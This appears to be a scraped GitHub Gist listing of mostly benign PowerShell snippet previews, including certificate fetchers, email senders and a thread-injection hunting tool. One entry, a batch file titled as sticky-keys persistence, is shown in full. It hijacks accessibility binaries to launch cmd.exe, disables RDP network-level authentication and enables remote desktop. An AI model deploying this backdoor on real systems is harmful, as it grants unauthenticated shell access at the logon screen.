Daniel Ferreira daniel0x00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Rotates a vertical set similar to an Excel PivotTable | |
| # | |
| # Given $data in the format: | |
| # | |
| # Category Activity Duration | |
| # ------------ ------------ -------- | |
| # Management Email 1 | |
| # Management Slides 4 | |
| # Project A Email 2 | |
| # Project A Research 1 |
jstangroome
/ Get-RemoteSSLCertificate.ps1
Last active
June 12, 2024 16:09
PowerShell script to retrieve the public X509 certificate from a remote TLS endpoint
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory=$true)] | |
| [string] | |
| $ComputerName, | |
| [int] | |
| $Port = 443 | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Start a web server that will route requests to a series of script blocks as defined by the -Routes parameter. | |
| .DESCRIPTION | |
| Starts a single-threaded web server and responds to requests by executing the script blocks that are | |
| defined as routes on the command line. | |
| .NOTES | |
| Copyright 2013 Chris Duck |
guitarrapc
/ Get-ScreenShot.ps1
Last active
July 31, 2023 15:21
Screenshot Automation with PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-ScreenShot | |
| { | |
| [CmdletBinding()] | |
| param( | |
| [parameter(Position = 0, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)] | |
| [ValidateNotNullOrEmpty()] | |
| [string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot", | |
| #screenshot_[yyyyMMdd_HHmmss_ffff].png | |
| [parameter(Position = 1, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)] |
sunnyc7
/ Send-EmailMessage.ps1
Created
April 23, 2014 15:25
Send-EmailMessage using Exchange Web Services
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Send-EMailMessage { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Position=1, Mandatory=$true)] | |
| [String[]] | |
| $To, | |
| [Parameter(Position=2, Mandatory=$false)] | |
| [String[]] | |
| $CcRecipients, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Parse evtx logs with evtxdump.py (https://github.com/williballenthin/python-evtx) | |
| 2. Create custom Splunk sourcetype "winevtx": | |
| Edit $SPLUNK_HOME/etc/system/local/props.conf | |
| [winevtx] | |
| NO_BINARY_CHECK = 1 | |
| SHOULD_LINEMERGE = true | |
| BREAK_ONLY_BEFORE = ^\<Event xmlns= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Registers a HTTP prefix and listens for a HttpRequest | |
| .DESCRIPTION | |
| Simple PowerShell HTTP Server implementation to respond to a single HTTP request | |
| .EXAMPLE | |
| Get-HttpRequest -UriPrefix "http://+:80/TestUri/" -ResponseData (Get-Content C:\inetpub\wwwroot\index.html) | |
| .EXAMPLE | |
| Get-HttpRequest -UriPrefix "http://127.0.0.1/" -ResponseData "It Works...!" -ShowRequest | |
| #> |
ahhh
/ sticky_keys_persitence.bat
Last active
September 9, 2022 10:17
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f | |
| netsh firewall set service type = remotedesktop mode = enable | |
| netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | |
| net start TermService |
micmaher
/ sendEWSemail.ps1
Last active
February 4, 2022 22:53
PowerShell Script - Send Email over Internet using Exchange Web Services API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Send-EWSEmail | |
| { | |
| <# | |
| .SYNOPSIS | |
| Sends email via Exchange Web Services | |
| .DESCRIPTION | |
| Must be run with parameters | |
| .PARAMETER Username |
jaredcatkinson
/ Get-InjectedThread.ps1
Last active
July 1, 2024 08:32
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
OlderNewer